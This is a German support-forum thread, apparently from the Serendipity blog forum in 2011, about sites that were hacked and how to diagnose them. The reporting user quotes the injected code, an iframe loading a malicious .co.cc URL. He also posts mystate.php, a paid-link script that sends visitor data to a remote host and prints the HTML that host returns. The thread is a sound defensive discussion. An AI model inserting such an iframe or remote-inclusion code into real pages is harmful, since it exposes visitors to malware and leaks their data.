Page 1 of 1
[Geirrt!] S9Y gehackt?
Posted: Thu Jul 14, 2011 2:17 pm
by HadleyB
Zwei meiner Webseiten, auf denen ich Serendipity betreibe, wurden in der letzten Nacht gehackt. Dabei wurde der Blog selbst nicht verändert, sondern eine "index.htm", die im Root lag (S9Y liegt im Unterverzeichnis CMS) durch den hacker verändert. Dies passierte bei zwei verschiedenen Hostern (Knallhart und MediaOn).
In die "index.htm" wurde, neben dem BODY-Tag, folgender Code eingefügt:
<body bgcolor="#FFFFFF">
<iframe src="http://wrangelrian.co.cc/in/in.php"></iframe>
<p>Es geht nicht weiter? Dann bitte <a href="cms/index.php">hier klicken</a>. </p>
</body>
Beiden Hostern ist nichts über eine Sicherheitslücke oder weiteren Hacks auf deren Servern bekannt. Es hat nur meine Webseite getroffen. Aus diesem Grund schieben es beide Hoster auf das S9Y-Script.
Re: S9Y gehackt?
Posted: Thu Jul 14, 2011 4:10 pm
by onli
Lief die aktuelle Version von serendipity?
Re: S9Y gehackt?
Posted: Thu Jul 14, 2011 5:30 pm
by Timbalu
Außer der sehr berechtigten Frage von Malte könnte man vielleicht auch mit verify
http://board.s9y.org/viewtopic.php?f=4&t=17755
etwas weiteres herausfinden.
Re: S9Y gehackt?
Posted: Thu Jul 14, 2011 9:20 pm
by HadleyB
Ja, es läuft immer die aktuellste Version.
Eine Frage:
verifyviewtopic.php?f=4&t=17755
Was soll das sein? Wie funktioniert das? Wo bekomme ich das her?
Re: S9Y gehackt?
Posted: Thu Jul 14, 2011 10:12 pm
by kleinerChemiker
Überprüf mal deine PCs auf Viren usw.
Benuttz du ordentliche Paßwörter? Benutzt du das selbe PAßwort bei unterschiedlichen Seiten? ICh denke nicht, daß es S9Y "gehackt" wurde, sondern eher du.
Re: S9Y gehackt?
Posted: Thu Jul 14, 2011 11:59 pm
by HadleyB
Es hat auch eine Kundenseite erwischt! Und da ist gar kein S9Y drauf! Es kann also gar nicht der Blog sein.
Danke für Eure Antworten! Anscheinend hab' ich mir etwas eingefangen. Trotz drei(!) Schadsoftscannern (Malwarebytes, Adaware und S&D) und Antivir.
Morgen setze ich meinen Rechner neu auf und ändere sämtliche Zugangspasswörter. Besser is das!
Re: S9Y gehackt?
Posted: Fri Jul 15, 2011 8:06 am
by Timbalu
HadleyB wrote:Was soll das sein? Wie funktioniert das? Wo bekomme ich das her?
Es steht alles drin wenn du auf den link drückst, der dich zum Verify thread führt.
Naja, eventuell ist das in deinem Falle auch gar nicht mehr nötig.
Re: [Geirrt!] S9Y gehackt?
Posted: Fri Jul 15, 2011 10:15 am
by HadleyB
Ich habs trotzdem mal gemacht (tolles Plugin!, es wurden auch drei veränderte Dateien gefunden. Die waren aber nicht infiziert.
So scheint S9Y sauber zu sein!
Re: [Geirrt!] S9Y gehackt?
Posted: Fri Jul 15, 2011 10:26 am
by Timbalu
danke.
kannst du die mir 3 angemeckerten mal posten, natürlich nur die Ausgabe mit Datum etc, damit ich sehen kann ob ich sie eventuell auch noch excluden muss.
Re: [Geirrt!] S9Y gehackt?
Posted: Fri Jul 15, 2011 4:41 pm
by HadleyB
Meinst Du so?
Re: [Geirrt!] S9Y gehackt?
Posted: Fri Jul 15, 2011 5:09 pm
by yellowled
Was ist denn mystate.php? Gehört das zu s9y?
YL
Re: [Geirrt!] S9Y gehackt?
Posted: Fri Jul 15, 2011 6:03 pm
by HadleyB
Keine Ahnung, ich habs gelöscht! Das Datum der Datei steht aber auf 07.04.2010. Auf dem anderen gehackten Server ist die nicht drauf.
Code: Select all
<?
$mls_userID = "5687";
$mls_debug = "0"; // Setzen Sie die Variable auf 1 um die Ausgabe zu testen
$mls_html_delim_pre = ""; // Trennzeichen vor dem Link (z.B.: <p> oder » oder ein anderes Zeichen)
$mls_html_delim_post = "<br>"; // Trennzeichen nach dem Link (z.B.: </p> oder ein anderes Zeichen)
$mls_site_encoding = ""; // Website encoding. Z.B.: KOI8-U, UTF-8, iso-8859-1
$mls_page = $_SERVER["REQUEST_URI"];
$mls_remote = $_SERVER["REMOTE_ADDR"];
$mls_url = "http://data.mylinkstate.com/?userID=".$mls_userID."&dom=".$_SERVER["HTTP_HOST"]."&page=".urlencode($mls_page)."&qstr=".urlencode($_SERVER["QUERY_STRING"])."&ip=".$mls_remote."&debug=".$mls_debug."&mls_html_delim_pre=".urlencode($mls_html_delim_pre)."&mls_html_delim_post=".urlencode($mls_html_delim_post)."&mls_site_encoding=".urlencode($mls_site_encoding);
$mls_html = "";
if ( function_exists('curl_init') ) { // check for CURL, if not use fopen
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $mls_url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 2);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 2);
curl_setopt ($ch, CURLOPT_LOW_SPEED_LIMIT, 100);
curl_setopt ($ch, CURLOPT_LOW_SPEED_TIME, 1);
$mls_html = curl_exec($ch);
curl_close($ch);
}
else{
if(@fsockopen("data.mylinkstate.com",80,$errno,$errstr,2)){
$mls_html=@implode("",file($mls_url));
}
}
// Output the links
if (strlen($mls_html) && $mls_html != 1){
echo $mls_html;
}
?>
Re: [Geirrt!] S9Y gehackt?
Posted: Mon Jul 18, 2011 9:00 am
by Timbalu
Danke - Jein..., bitte lösch mal dieses screenshot. Der ist hier unnötig.
serendipity_event_picasa.zip liegt inzwischen in einer aktualisierten version vor, ohne weiter aufzufallen.
die plogpdf/gif.php wurde meiner Ausnahmeliste hinzugefügt.
serendipity_event_verify liegt in einem anderen plugin ordner (recententries) und hat dort ebenfalls nichts zu suchen.
Diese ominöse mystate.php ist ein Service, der bezahlte Links auf Webseites schaltet. Dort musst du dich angemeldet und diese Datei eingefügt haben. Oder hat da dein Hacker etwa persönliche Spuren hinterlassen? Sollte ersteres zutreffen bitte hier etwas anonymisieren!
BTW, @Garvin sourceforge CVS meldet - nur zip geht
An Exception Has Occurred
The root "php-blog" is unknown. If you believe the value is correct, then please double-check your configuration.
HTTP Response Status
404 Not Found
Re: [Geirrt!] S9Y gehackt?
Posted: Mon Jul 18, 2011 9:30 am
by garvinhicking